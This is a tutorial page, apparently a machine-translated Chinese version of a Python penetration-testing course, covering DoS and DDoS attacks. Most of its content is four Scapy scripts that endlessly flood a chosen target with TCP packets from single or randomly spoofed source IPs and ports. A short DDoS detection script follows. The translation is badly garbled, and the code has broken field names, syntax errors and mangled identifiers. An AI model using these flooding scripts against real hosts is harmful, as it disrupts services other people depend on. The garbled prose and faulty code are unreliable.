Python Penetration Testing Tutorial
Selected Reading
- Discussion
- Useful Resources
- Quick Guide
- XSS Web Attack
- SQLi Web Attack
- DoS & DDoS attack
- Client-side Validation
- Application Layer
- Pentesting of Wireless Network
- ARP Spoofing
- Network Packet Sniffing
- Python Network Scanner
- The Socket and its Methods
- Primer on Network Communication
- Assessment Methodology
- Introduction
- Python Penetration Testing - Home
Selected Reading
- Who is Who
- Computer Glossary
- HR Interview Questions
- Effective Resume Writing
- Questions and Answers
- UPSC IAS Exams Notes
DoS & DDoS attack
DoS & DDoS attack
在本章中,我们将了解DoS和DdoS的袭击,并了解如何发现这些袭击。
随着电子商务产业的兴旺,网络服务器现在很容易受到攻击,成为黑客的容易目标。 哈萨克人通常试图进行两类攻击——
DoS (Denial-of-Service)
DDoS (Distribted Denial of Service)
DoS (Denial-of-Service) Attack
拒绝服务(DoS)攻击是黑客企图提供网络资源。 它通常中断与互联网连接的东道方,无论是临时的还是无限期的。 这些袭击通常针对在银行、信用卡付款网关等特派团关键网络服务器上提供的服务。
Symptoms of DoS attack
网络业绩异常缓慢。
没有特定网站。
无法进入任何网站。
收到的垃圾邮件数量剧增。
长期拒绝上网或任何互联网服务。
没有专门的网站。
Types of DoS Attack & its Python Implementation
可在数据链接、网络或应用层进行多功能攻击。 我们现在要了解多斯袭击和袭击的不同类型;这些攻击和袭击是在沙尔实施的。
Single IP single port
大量包装箱通过使用单一IP和单一港口号码发送到网络服务器。 这是一种低水平的攻击,用来检查网络服务器的行为。 在Scapy的帮助下,可以在沙尔实施。 The following python script will help implementing inspanidual IP inspanidual port DoS attacks -
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1
while True:
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter = .001)
print ("packet sent ", i)
i = i + 1
在执行时,上述文字将要求以下三点:
IP Address of sources and Target.
IP Address of source port number.
然后,它将向服务器发送大量包裹,以检查其行为。
Single IP Multiple port
大量包装箱通过使用单一IP和多个港口发送到网络服务器。 在Scapy的帮助下,可以在沙尔实施。 The following python script will help implementing inspanidual IP multi port DoS attacks -
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
i = 1
while True:
for source_port in range(1, 65535)
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter = .001)
print ("packet sent ", i)
i = i + 1
Multiple IP single port
大量包装箱通过使用多个IP和单一港口号码发送到网络服务器。 在Scapy的帮助下,可以在沙尔实施。 下面的“Za”类文字实施“IP”多港口多功能攻击——
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = “.”
Source_ip = a + dot + b + dot + c + dot + d
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt,inter = .001)
print ("packet sent ", i)
i = i + 1
Multiple IP multiple port
大量包装箱通过使用多个IP和多个港口发送到网络服务器。 在Scapy的帮助下,可以在沙尔实施。 下面的沙尔文有助于实施多台IP式多台港口DoS攻击。
Import random
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
i = 1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = “.”
Source_ip = a + dot + b + dot + c + dot + d
for source_port in range(1, 65535)
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt,inter = .001)
print ("packet sent ", i)
i = i + 1
DDoS (Distributed Denial-of-Service) Attack
分布式的登勤(DDoS)攻击是试图通过多来源造成的大量交通淹没,使在线服务或网站无法使用。
与“登机”攻击不同的是,一个计算机和一个互联网连接被用来淹没一个带有包装的专用资源,而多台计算机和许多因特网连接则使用许多计算机和许多互联网,常常在被称为“机器人网”的全球传播。 大规模猛烈的DDoS攻击可产生每秒10千吉比特(甚至数百吉比)的交通量。 可在
Detection of DDoS using Python
实际上,DDoS的袭击是难以察觉的,因为你不知道运送的东道国是假的。 下面提供的灰色文字将有助于探测DDoS的袭击。
首先,让我们进口必要的图书馆——
import socket import struct from datetime import datetime
现在,我们将像我们在前几节中所做的那样,编制一个目录。
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
我们将使用空洞的字典——
dict = {}
下面的法典将打开一个文本文件,其中附有DDoS攻击的细节。
file_txt = open("attack_DDoS.txt", a )
t1 = str(datetime.now())
在以下法典系的帮助下,当方案实施时,将写出目前的时间。
file_txt.writepnes(t1)
file_txt.writepnes("
")
现在,我们需要从某个国际警察组织那里接手。 在这里,我们假定,如果某一个警察正在打上超过15次的枪声,那将是袭击。
No_of_IPs = 15
R_No_of_IPs = No_of_IPs +10
while True:
pkt = s.recvfrom(2048)
ipheader = pkt[0][14:34]
ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
IP = socket.inet_ntoa(ip_hdr[3])
print "The Source of the IP is:", IP
下面的法典将检查知识产权是否在字典中存在。 如果存在的话,则将增加1。
if dict.has_key(IP): dict[IP] = dict[IP]+1 print dict[IP]
接下来的法典系用于消除 red余。
if(dict[IP] > No_of_IPs) and (dict[IP] < R_No_of_IPs) :
pne = "DDOS attack is Detected: "
file_txt.writepnes(pne)
file_txt.writepnes(IP)
file_txt.writepnes("
")
else:
dict[IP] = 1
在管理上述文字后,我们将产生一份文本文件。 据该书称,如果一名IP公司打了15多次以上,那么,当DDoS攻击事件与IP地址一起被发现时,就会印制。
Advertisements